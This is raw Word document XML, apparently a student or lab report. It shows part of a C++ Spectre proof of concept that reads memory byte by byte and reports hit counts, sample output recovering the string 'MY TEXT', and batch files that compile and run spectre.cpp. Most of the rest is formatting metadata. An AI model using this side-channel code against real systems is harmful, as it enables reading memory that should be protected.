    <w:p w14:paraId="17552F3B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len; ++i) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A01A06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out &lt;&lt; "Reading " &lt;&lt; (void *) target_pos &lt;&lt; "... ";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B72A10C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7993435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ur_guess = get_byte(target_pos++);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B74AFFE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printf("%s: ", (cur_guess.second[0] &gt;= 2 * cur_guess.second[1] ? "Success" : "Unclear"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06907BD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EBB56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result[i] = ((cur_guess.first.first &gt; 31 &amp;&amp; cur_guess.first.first &lt; 127) ? cur_guess.first.first : '?');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409B298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</w:p>
    <w:p w14:paraId="1B9401B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printf("0x%02X='%c' hits=%d", cur_guess.first.first, result[i], cur_guess.second[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1812D11A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</w:p>
    <w:p w14:paraId="24ECA372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if (cur_guess.second[1] &gt; 0) printf(" (second best: 0x%02X hits=%d)", cur_guess.first.second, cur_guess.second[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25470D74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1DBE81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out &lt;&lt; endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C63A919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765B0FC0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E7839A1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 xml:space="preserve">   </w:t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for (int i = 0; i &lt; len; ++i) cout &lt;&lt; result[i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05479927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</w:r>
      <w:r w:rsidRPr="00BE06EB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>cout &lt;&lt; endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CB2178" w14:textId="77777777" w:rsidR="00BE06EB" w:rsidRPr="00BE06EB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1E0F2C46" w14:textId="59CFCA30" w:rsidR="00EC60D4" w:rsidRDefault="00BE06EB" w:rsidP="00BE06E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E06EB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68E0CCC8" w14:textId="131D1550" w:rsidR="00563EFA" w:rsidRDefault="00563EFA" w:rsidP="000A1C35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A41F8FB" w14:textId="655A63E1" w:rsidR="00FB45CF" w:rsidRPr="0016032F" w:rsidRDefault="00FB45CF" w:rsidP="00FB45CF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>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>output</w:t>
      </w:r>
      <w:r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.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B15187C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7 bytes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235937BF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8... Success: 0x4D='M' hits=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BC670A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9... Success: 0x59='Y' hits=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C9BD81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A... Success: 0x20=' ' hits=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4477D3A8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B... Success: 0x54='T' hits=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FFAD0C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C... Success: 0x45='E' hits=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429E771B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D... Success: 0x58='X' hits=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544C272A" w14:textId="77777777" w:rsidR="00FD64C1" w:rsidRPr="00FD64C1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Reading 0xFFCAD71E... Success: 0x54='T' hits=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC74CD1" w14:textId="088766BB" w:rsidR="00563EFA" w:rsidRDefault="00FD64C1" w:rsidP="00FD64C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FD64C1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MY TEXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7407393C" w14:textId="77777777" w:rsidR="000A1C35" w:rsidRPr="0016032F" w:rsidRDefault="000A1C35" w:rsidP="000A1C35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F5A4340" w14:textId="02BD7BFD" w:rsidR="00767450" w:rsidRPr="0016032F" w:rsidRDefault="00767450" w:rsidP="00180561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run.cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4A4139" w14:textId="3D574839" w:rsidR="00767450" w:rsidRDefault="00CB3B3D" w:rsidP="00CB3B3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B3B3D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cls &amp;&amp; "C:\Program Files\mingw-w64\x86_64-8.1.0-posix-seh-rt_v6-rev0\mingw64\bin\g++.exe" "spectre.cpp" -o "spectre.exe" &amp;&amp; "spectre.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587A789D" w14:textId="6D720AEE" w:rsidR="00CB3B3D" w:rsidRDefault="00CB3B3D" w:rsidP="00CB3B3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675290A" w14:textId="1A75F2CE" w:rsidR="00CB3B3D" w:rsidRPr="0016032F" w:rsidRDefault="00CB3B3D" w:rsidP="00CB3B3D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run</w:t>
      </w:r>
      <w:r w:rsidRPr="00454790">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arg</w:t>
      </w:r>
      <w:r w:rsidRPr="0016032F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1A3BE1" w14:textId="17C8D1A1" w:rsidR="00CB3B3D" w:rsidRPr="0016032F" w:rsidRDefault="00454790" w:rsidP="00CB3B3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54790">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cls &amp;&amp; "C:\Program Files\mingw-w64\x86_64-8.1.0-posix-seh-rt_v6-rev0\mingw64\bin\g++.exe" "spectre.cpp" -o "spectre.exe" &amp;&amp; "spectre.exe" "MY TEXT" 7 "output.txt"</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00CB3B3D" w:rsidRPr="0016032F" w:rsidSect="00103726">
      <w:headerReference w:type="default" r:id="rId10"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="849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48BE" w14:textId="77777777" w:rsidR="00912EAA" w:rsidRDefault="00912EAA" w:rsidP="00103726">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="09062006" w14:textId="77777777" w:rsidR="00912EAA" w:rsidRDefault="00912EAA" w:rsidP="0010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7B897" w14:textId="77777777" w:rsidR="00912EAA" w:rsidRDefault="00912EAA" w:rsidP="00103726">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="77088897" w14:textId="77777777" w:rsidR="00912EAA" w:rsidRDefault="00912EAA" w:rsidP="0010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ED09" w14:textId="77777777" w:rsidR="00A41963" w:rsidRDefault="00A419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4ADC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D6ED2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921995"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21C4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1A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20EC4B0C"/>
    <w:lvl w:ilvl="0" w:tplc="7742BC4C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1AC72C1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6CE2B9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3953CB5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B71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95F29"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="462E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73F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6EA4E5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82470A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38F69EC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85C36CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="85D6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6CF0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8EA62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F1D5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B698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466B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E36C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363D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A51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97"/>
    <w:rsid w:val="000005C2"/>
    <w:rsid w:val="0000089D"/>
    <w:rsid w:val="00006A14"/>
    <w:rsid w:val="000136AF"/>
    <w:rsid w:val="0001430C"/>
    <w:rsid w:val="000163C7"/>
    <w:rsid w:val="0001678A"/>
    <w:rsid w:val="00022B8F"/>
    <w:rsid w:val="00023218"/>
    <w:rsid w:val="000236D8"/>
    <w:rsid w:val="00023973"/>
    <w:rsid w:val="00024A11"/>
    <w:rsid w:val="00024FDB"/>
    <w:rsid w:val="00027DBC"/>
    <w:rsid w:val="00027E81"/>
    <w:rsid w:val="00031830"/>
    <w:rsid w:val="00032074"/>
    <w:rsid w:val="000342D7"/>
    <w:rsid w:val="0003446E"/>
    <w:rsid w:val="00034821"/>
    <w:rsid w:val="0003530E"/>
    <w:rsid w:val="00045BB4"/>
    <w:rsid w:val="000465CA"/>
    <w:rsid w:val="00051455"/>
    <w:rsid w:val="00053D1A"/>
    <w:rsid w:val="00054DDA"/>
    <w:rsid w:val="000558C0"/>
    <w:rsid w:val="00055C3E"/>
    <w:rsid w:val="00056FF1"/>
    <w:rsid w:val="00061FF7"/>
    <w:rsid w:val="000630B0"/>
    <w:rsid w:val="00063735"/>
    <w:rsid w:val="00064E12"/>
    <w:rsid w:val="00066D35"/>
    <w:rsid w:val="000707F0"/>
    <w:rsid w:val="00070B47"/>
    <w:rsid w:val="000727BD"/>
    <w:rsid w:val="00073B4C"/>
    <w:rsid w:val="00075AE6"/>
    <w:rsid w:val="00082256"/>
    <w:rsid w:val="00082D9B"/>
    <w:rsid w:val="00085C6A"/>
    <w:rsid w:val="00090DEA"/>
    <w:rsid w:val="00091279"/>
    <w:rsid w:val="00091BFD"/>
    <w:rsid w:val="000922CB"/>
    <w:rsid w:val="00092509"/>
    <w:rsid w:val="000926C5"/>
    <w:rsid w:val="00093749"/>
    <w:rsid w:val="00094953"/>
    <w:rsid w:val="00094DE2"/>
    <w:rsid w:val="00095E95"/>
    <w:rsid w:val="00097A14"/>
    <w:rsid w:val="000A148E"/>
    <w:rsid w:val="000A1C35"/>
    <w:rsid w:val="000A2739"/>
    <w:rsid w:val="000A29B0"/>
    <w:rsid w:val="000A2E2E"/>
    <w:rsid w:val="000A3D38"/>
    <w:rsid w:val="000A4137"/>
    <w:rsid w:val="000A49C5"/>
    <w:rsid w:val="000A57DF"/>
    <w:rsid w:val="000A7CDB"/>
    <w:rsid w:val="000B0DC3"/>
    <w:rsid w:val="000B0E23"/>
    <w:rsid w:val="000B1328"/>
    <w:rsid w:val="000B16ED"/>
    <w:rsid w:val="000B4F54"/>
    <w:rsid w:val="000B751B"/>
    <w:rsid w:val="000C32B0"/>
    <w:rsid w:val="000D05EA"/>
    <w:rsid w:val="000D1BA7"/>
    <w:rsid w:val="000D1EBE"/>
    <w:rsid w:val="000D2CCD"/>
    <w:rsid w:val="000D564A"/>
    <w:rsid w:val="000D7FE4"/>
    <w:rsid w:val="000E0B5B"/>
    <w:rsid w:val="000E51C3"/>
    <w:rsid w:val="000F01F6"/>
    <w:rsid w:val="000F0BA5"/>
    <w:rsid w:val="000F49B5"/>
    <w:rsid w:val="000F4F91"/>
    <w:rsid w:val="000F73E8"/>
    <w:rsid w:val="00101415"/>
    <w:rsid w:val="001017D3"/>
    <w:rsid w:val="0010216A"/>
    <w:rsid w:val="00103019"/>
    <w:rsid w:val="00103726"/>
    <w:rsid w:val="001058A0"/>
    <w:rsid w:val="00110916"/>
    <w:rsid w:val="001114FB"/>
    <w:rsid w:val="00112909"/>
    <w:rsid w:val="001151B4"/>
    <w:rsid w:val="001163EF"/>
    <w:rsid w:val="001218E7"/>
    <w:rsid w:val="001228E5"/>
    <w:rsid w:val="00125BE5"/>
    <w:rsid w:val="00125CBB"/>
    <w:rsid w:val="00130324"/>
    <w:rsid w:val="0013430E"/>
    <w:rsid w:val="00134B1E"/>
    <w:rsid w:val="00140790"/>
    <w:rsid w:val="0014460D"/>
    <w:rsid w:val="001474A4"/>
    <w:rsid w:val="001507BD"/>
    <w:rsid w:val="00152549"/>
    <w:rsid w:val="0015422C"/>
    <w:rsid w:val="00155FEF"/>
    <w:rsid w:val="00156B34"/>
    <w:rsid w:val="00157EDD"/>
    <w:rsid w:val="0016032F"/>
    <w:rsid w:val="001607AF"/>
    <w:rsid w:val="00162914"/>
    <w:rsid w:val="00164019"/>
    <w:rsid w:val="00165709"/>
    <w:rsid w:val="00165C23"/>
    <w:rsid w:val="0016600C"/>
    <w:rsid w:val="00166358"/>
    <w:rsid w:val="00171547"/>
    <w:rsid w:val="00172A7E"/>
    <w:rsid w:val="00175179"/>
    <w:rsid w:val="0017590C"/>
    <w:rsid w:val="00180561"/>
    <w:rsid w:val="001816BF"/>
    <w:rsid w:val="00181C55"/>
    <w:rsid w:val="0018386A"/>
    <w:rsid w:val="0018586A"/>
    <w:rsid w:val="00186AC6"/>
    <w:rsid w:val="00187E8E"/>
    <w:rsid w:val="001A0848"/>
    <w:rsid w:val="001A0C6F"/>
    <w:rsid w:val="001A5A2D"/>
    <w:rsid w:val="001A7121"/>
    <w:rsid w:val="001A761F"/>
    <w:rsid w:val="001B0BB0"/>
    <w:rsid w:val="001B6922"/>
    <w:rsid w:val="001C0634"/>
    <w:rsid w:val="001C07BC"/>
    <w:rsid w:val="001C341E"/>
    <w:rsid w:val="001C527F"/>
    <w:rsid w:val="001D0345"/>
    <w:rsid w:val="001D1236"/>
    <w:rsid w:val="001D1410"/>
    <w:rsid w:val="001D1ECE"/>
    <w:rsid w:val="001D2C25"/>
    <w:rsid w:val="001E0670"/>
    <w:rsid w:val="001E2221"/>
    <w:rsid w:val="001E4101"/>
    <w:rsid w:val="001E696C"/>
    <w:rsid w:val="001E6980"/>
    <w:rsid w:val="001F0ACF"/>
    <w:rsid w:val="001F1602"/>
    <w:rsid w:val="001F1618"/>
    <w:rsid w:val="001F1940"/>
    <w:rsid w:val="001F1DA6"/>
    <w:rsid w:val="001F33DE"/>
    <w:rsid w:val="001F3417"/>
    <w:rsid w:val="001F3653"/>
    <w:rsid w:val="001F55FF"/>
    <w:rsid w:val="001F565D"/>
    <w:rsid w:val="001F607C"/>
    <w:rsid w:val="001F6FC7"/>
    <w:rsid w:val="002020ED"/>
    <w:rsid w:val="0020285C"/>
    <w:rsid w:val="00202F5C"/>
    <w:rsid w:val="00206BA1"/>
    <w:rsid w:val="00215E49"/>
    <w:rsid w:val="002166FD"/>
    <w:rsid w:val="00216835"/>
    <w:rsid w:val="00216A16"/>
    <w:rsid w:val="002210B0"/>
    <w:rsid w:val="00221494"/>
    <w:rsid w:val="00223B34"/>
    <w:rsid w:val="00224493"/>
    <w:rsid w:val="00225D92"/>
    <w:rsid w:val="00226D68"/>
    <w:rsid w:val="0023082B"/>
    <w:rsid w:val="002314B9"/>
    <w:rsid w:val="0023520C"/>
    <w:rsid w:val="00237AC6"/>
    <w:rsid w:val="0024075E"/>
    <w:rsid w:val="002409FA"/>
    <w:rsid w:val="00246303"/>
    <w:rsid w:val="002465F7"/>
    <w:rsid w:val="00246733"/>
    <w:rsid w:val="002478BA"/>
    <w:rsid w:val="002551FE"/>
    <w:rsid w:val="00256421"/>
    <w:rsid w:val="0025672B"/>
    <w:rsid w:val="00256953"/>
    <w:rsid w:val="002569B8"/>
    <w:rsid w:val="00260E14"/>
    <w:rsid w:val="002630A7"/>
    <w:rsid w:val="00263F68"/>
    <w:rsid w:val="00266A57"/>
    <w:rsid w:val="0027064E"/>
    <w:rsid w:val="0027223B"/>
    <w:rsid w:val="00274EAE"/>
    <w:rsid w:val="00275886"/>
    <w:rsid w:val="00275DB0"/>
    <w:rsid w:val="00277C16"/>
    <w:rsid w:val="00281AFF"/>
    <w:rsid w:val="00285085"/>
    <w:rsid w:val="00285D4C"/>
    <w:rsid w:val="00292388"/>
    <w:rsid w:val="00293B7B"/>
    <w:rsid w:val="00294512"/>
    <w:rsid w:val="002954F1"/>
    <w:rsid w:val="002A0783"/>
    <w:rsid w:val="002A3273"/>
    <w:rsid w:val="002A42E2"/>
    <w:rsid w:val="002A647C"/>
    <w:rsid w:val="002A6E02"/>
    <w:rsid w:val="002B1233"/>
    <w:rsid w:val="002B16F4"/>
    <w:rsid w:val="002B46ED"/>
    <w:rsid w:val="002B567C"/>
    <w:rsid w:val="002C0DD5"/>
    <w:rsid w:val="002C499F"/>
    <w:rsid w:val="002C5ED1"/>
    <w:rsid w:val="002C6263"/>
    <w:rsid w:val="002C76F8"/>
    <w:rsid w:val="002D474A"/>
    <w:rsid w:val="002D56DF"/>
    <w:rsid w:val="002D73F6"/>
    <w:rsid w:val="002E21DA"/>
    <w:rsid w:val="002E4A95"/>
    <w:rsid w:val="002E6343"/>
    <w:rsid w:val="002E6A9D"/>
    <w:rsid w:val="002E7678"/>
    <w:rsid w:val="002E7754"/>
    <w:rsid w:val="002F1CF7"/>
    <w:rsid w:val="002F34A9"/>
    <w:rsid w:val="002F579B"/>
    <w:rsid w:val="0030546F"/>
    <w:rsid w:val="003059B2"/>
    <w:rsid w:val="00306753"/>
    <w:rsid w:val="0030680A"/>
    <w:rsid w:val="00306B39"/>
    <w:rsid w:val="003106F8"/>
    <w:rsid w:val="00310ECB"/>
    <w:rsid w:val="00312023"/>
    <w:rsid w:val="003121E7"/>
    <w:rsid w:val="00312E1E"/>
    <w:rsid w:val="0031374F"/>
    <w:rsid w:val="003142F6"/>
    <w:rsid w:val="00314FC7"/>
    <w:rsid w:val="00315488"/>
    <w:rsid w:val="003159AC"/>
    <w:rsid w:val="00316B1C"/>
    <w:rsid w:val="00317B38"/>
    <w:rsid w:val="00321B9B"/>
    <w:rsid w:val="00323D45"/>
    <w:rsid w:val="00324197"/>
    <w:rsid w:val="0032484D"/>
    <w:rsid w:val="00325DC5"/>
    <w:rsid w:val="0032676E"/>
    <w:rsid w:val="003269FD"/>
    <w:rsid w:val="00327433"/>
    <w:rsid w:val="003326F9"/>
    <w:rsid w:val="00333C84"/>
    <w:rsid w:val="00333F2A"/>
    <w:rsid w:val="00336A24"/>
    <w:rsid w:val="00337B9F"/>
    <w:rsid w:val="00337BE2"/>
    <w:rsid w:val="00341544"/>
    <w:rsid w:val="003428F7"/>
    <w:rsid w:val="00342CC5"/>
    <w:rsid w:val="00344633"/>
    <w:rsid w:val="00344885"/>
    <w:rsid w:val="00345FAD"/>
    <w:rsid w:val="00351566"/>
    <w:rsid w:val="003533EA"/>
    <w:rsid w:val="00354AE8"/>
    <w:rsid w:val="003552D2"/>
    <w:rsid w:val="0035643E"/>
    <w:rsid w:val="00360C4C"/>
    <w:rsid w:val="00361057"/>
    <w:rsid w:val="0036253D"/>
    <w:rsid w:val="003648F9"/>
    <w:rsid w:val="00364F89"/>
    <w:rsid w:val="003661A7"/>
    <w:rsid w:val="0037033E"/>
    <w:rsid w:val="003713E5"/>
    <w:rsid w:val="00374186"/>
    <w:rsid w:val="00375BB4"/>
    <w:rsid w:val="0037630C"/>
    <w:rsid w:val="00381001"/>
    <w:rsid w:val="00385FDA"/>
    <w:rsid w:val="00386B75"/>
    <w:rsid w:val="0038782F"/>
    <w:rsid w:val="00390224"/>
    <w:rsid w:val="00390676"/>
    <w:rsid w:val="00391801"/>
    <w:rsid w:val="003920BE"/>
    <w:rsid w:val="0039260C"/>
    <w:rsid w:val="003930FD"/>
    <w:rsid w:val="00393B16"/>
    <w:rsid w:val="00394FEE"/>
    <w:rsid w:val="003967AB"/>
    <w:rsid w:val="003A0B7F"/>
    <w:rsid w:val="003A1F61"/>
    <w:rsid w:val="003A2E33"/>
    <w:rsid w:val="003A580B"/>
    <w:rsid w:val="003A5AC4"/>
    <w:rsid w:val="003A648D"/>
    <w:rsid w:val="003A6624"/>
    <w:rsid w:val="003B0F34"/>
    <w:rsid w:val="003B6353"/>
    <w:rsid w:val="003B6FE1"/>
    <w:rsid w:val="003B7149"/>
    <w:rsid w:val="003B74B2"/>
    <w:rsid w:val="003C0742"/>
    <w:rsid w:val="003C7AF8"/>
    <w:rsid w:val="003C7F05"/>
    <w:rsid w:val="003D1DFE"/>
    <w:rsid w:val="003D2F5B"/>
    <w:rsid w:val="003D4CD6"/>
    <w:rsid w:val="003D4E3F"/>
    <w:rsid w:val="003D558D"/>
    <w:rsid w:val="003D5F4A"/>
    <w:rsid w:val="003D6361"/>
    <w:rsid w:val="003D7563"/>
    <w:rsid w:val="003E13FF"/>
    <w:rsid w:val="003E14D8"/>
    <w:rsid w:val="003E627B"/>
    <w:rsid w:val="003F34E8"/>
    <w:rsid w:val="003F50EF"/>
    <w:rsid w:val="003F5F4E"/>
    <w:rsid w:val="003F7E19"/>
    <w:rsid w:val="00402D1C"/>
    <w:rsid w:val="00406775"/>
    <w:rsid w:val="00410A77"/>
    <w:rsid w:val="0041301D"/>
    <w:rsid w:val="00413FE9"/>
    <w:rsid w:val="00414F12"/>
    <w:rsid w:val="004157F6"/>
    <w:rsid w:val="00416681"/>
    <w:rsid w:val="00417561"/>
    <w:rsid w:val="004177B8"/>
    <w:rsid w:val="00417D6B"/>
    <w:rsid w:val="004210B3"/>
    <w:rsid w:val="00421F6F"/>
    <w:rsid w:val="00426468"/>
    <w:rsid w:val="00427524"/>
    <w:rsid w:val="0043241F"/>
    <w:rsid w:val="00434732"/>
    <w:rsid w:val="00436761"/>
    <w:rsid w:val="00443C62"/>
    <w:rsid w:val="00445E66"/>
    <w:rsid w:val="004517EE"/>
    <w:rsid w:val="00451AB3"/>
    <w:rsid w:val="00451B97"/>
    <w:rsid w:val="00452DDF"/>
    <w:rsid w:val="0045339D"/>
    <w:rsid w:val="00454790"/>
    <w:rsid w:val="00457C9C"/>
    <w:rsid w:val="0046076F"/>
    <w:rsid w:val="004625ED"/>
    <w:rsid w:val="0046427A"/>
    <w:rsid w:val="00466E4C"/>
    <w:rsid w:val="00470188"/>
    <w:rsid w:val="00471530"/>
    <w:rsid w:val="00477FD1"/>
    <w:rsid w:val="00480196"/>
    <w:rsid w:val="00480BE5"/>
    <w:rsid w:val="00481A11"/>
    <w:rsid w:val="00482330"/>
    <w:rsid w:val="00482DB1"/>
    <w:rsid w:val="00485E04"/>
    <w:rsid w:val="00490C8D"/>
    <w:rsid w:val="00490E1C"/>
    <w:rsid w:val="004913D2"/>
    <w:rsid w:val="00491B52"/>
    <w:rsid w:val="0049327E"/>
    <w:rsid w:val="00495403"/>
    <w:rsid w:val="00496CD8"/>
    <w:rsid w:val="004A262E"/>
    <w:rsid w:val="004A6843"/>
    <w:rsid w:val="004A7C11"/>
    <w:rsid w:val="004B0796"/>
    <w:rsid w:val="004B2AA2"/>
    <w:rsid w:val="004B7A26"/>
    <w:rsid w:val="004C0570"/>
    <w:rsid w:val="004C15F3"/>
    <w:rsid w:val="004C1E80"/>
    <w:rsid w:val="004C2579"/>
    <w:rsid w:val="004C3666"/>
    <w:rsid w:val="004C36F8"/>
    <w:rsid w:val="004C4450"/>
    <w:rsid w:val="004C4544"/>
    <w:rsid w:val="004C4C69"/>
    <w:rsid w:val="004C58A1"/>
    <w:rsid w:val="004D060F"/>
    <w:rsid w:val="004D69EE"/>
    <w:rsid w:val="004D6CA1"/>
    <w:rsid w:val="004E0336"/>
    <w:rsid w:val="004E21AD"/>
    <w:rsid w:val="004E2BA6"/>
    <w:rsid w:val="004E3827"/>
    <w:rsid w:val="004E3DB8"/>
    <w:rsid w:val="004E497B"/>
    <w:rsid w:val="004E49D1"/>
    <w:rsid w:val="004E4FCF"/>
    <w:rsid w:val="004E50AB"/>
    <w:rsid w:val="004E528A"/>
    <w:rsid w:val="004E7E78"/>
    <w:rsid w:val="004F02A3"/>
    <w:rsid w:val="004F0568"/>
    <w:rsid w:val="004F15A8"/>
    <w:rsid w:val="004F30B2"/>
    <w:rsid w:val="004F3845"/>
    <w:rsid w:val="0050145D"/>
    <w:rsid w:val="00501687"/>
    <w:rsid w:val="00502FD1"/>
    <w:rsid w:val="00503BB6"/>
    <w:rsid w:val="005057B2"/>
    <w:rsid w:val="00505974"/>
    <w:rsid w:val="005059A8"/>
    <w:rsid w:val="00510FDF"/>
    <w:rsid w:val="0051101E"/>
    <w:rsid w:val="00511C61"/>
    <w:rsid w:val="00512CD7"/>
    <w:rsid w:val="0051393C"/>
    <w:rsid w:val="00514B3F"/>
    <w:rsid w:val="005160CF"/>
    <w:rsid w:val="00516827"/>
    <w:rsid w:val="005169CB"/>
    <w:rsid w:val="005278B2"/>
    <w:rsid w:val="00527EAD"/>
    <w:rsid w:val="005303D4"/>
    <w:rsid w:val="00532F63"/>
    <w:rsid w:val="00534A2A"/>
    <w:rsid w:val="005422CB"/>
    <w:rsid w:val="0054307A"/>
    <w:rsid w:val="0054573D"/>
    <w:rsid w:val="005463D0"/>
    <w:rsid w:val="00546A1D"/>
    <w:rsid w:val="0054744C"/>
    <w:rsid w:val="005502A3"/>
    <w:rsid w:val="005515C5"/>
    <w:rsid w:val="00556695"/>
    <w:rsid w:val="00557899"/>
    <w:rsid w:val="00560658"/>
    <w:rsid w:val="00563252"/>
    <w:rsid w:val="00563EFA"/>
    <w:rsid w:val="005645B8"/>
    <w:rsid w:val="005645FA"/>
    <w:rsid w:val="00566C92"/>
    <w:rsid w:val="00566FAE"/>
    <w:rsid w:val="00566FE2"/>
    <w:rsid w:val="005734C0"/>
    <w:rsid w:val="00573940"/>
    <w:rsid w:val="00574151"/>
    <w:rsid w:val="0057431F"/>
    <w:rsid w:val="005743BE"/>
    <w:rsid w:val="005753D5"/>
    <w:rsid w:val="00575C00"/>
    <w:rsid w:val="0058300F"/>
    <w:rsid w:val="0058574A"/>
    <w:rsid w:val="0058575B"/>
    <w:rsid w:val="0058661F"/>
    <w:rsid w:val="0058753B"/>
    <w:rsid w:val="005924E9"/>
    <w:rsid w:val="00593165"/>
    <w:rsid w:val="00593D0C"/>
    <w:rsid w:val="00596AB6"/>
    <w:rsid w:val="005A169D"/>
    <w:rsid w:val="005A22F6"/>
    <w:rsid w:val="005A2A82"/>
    <w:rsid w:val="005A4B5E"/>
    <w:rsid w:val="005A6A0D"/>
    <w:rsid w:val="005A733D"/>
    <w:rsid w:val="005B05BA"/>
    <w:rsid w:val="005B0F1E"/>
    <w:rsid w:val="005B3CD7"/>
    <w:rsid w:val="005B3D91"/>
    <w:rsid w:val="005B48FF"/>
    <w:rsid w:val="005B5809"/>
    <w:rsid w:val="005B5C71"/>
    <w:rsid w:val="005B5CC0"/>
    <w:rsid w:val="005B70F1"/>
    <w:rsid w:val="005C033E"/>
    <w:rsid w:val="005C3115"/>
    <w:rsid w:val="005C3A47"/>
    <w:rsid w:val="005C5676"/>
    <w:rsid w:val="005C6CC7"/>
    <w:rsid w:val="005D09EF"/>
    <w:rsid w:val="005D0F5A"/>
    <w:rsid w:val="005D1374"/>
    <w:rsid w:val="005D1A58"/>
    <w:rsid w:val="005D2C07"/>
    <w:rsid w:val="005D4B64"/>
    <w:rsid w:val="005D62B7"/>
    <w:rsid w:val="005D7279"/>
    <w:rsid w:val="005E4276"/>
    <w:rsid w:val="005E4CD8"/>
    <w:rsid w:val="005E52F3"/>
    <w:rsid w:val="005E5B8A"/>
    <w:rsid w:val="005E731B"/>
    <w:rsid w:val="005F468D"/>
    <w:rsid w:val="005F4A13"/>
    <w:rsid w:val="005F52F8"/>
    <w:rsid w:val="005F782B"/>
    <w:rsid w:val="005F7ACB"/>
    <w:rsid w:val="00601CCA"/>
    <w:rsid w:val="006029BF"/>
    <w:rsid w:val="00605629"/>
    <w:rsid w:val="00605872"/>
    <w:rsid w:val="00605DBA"/>
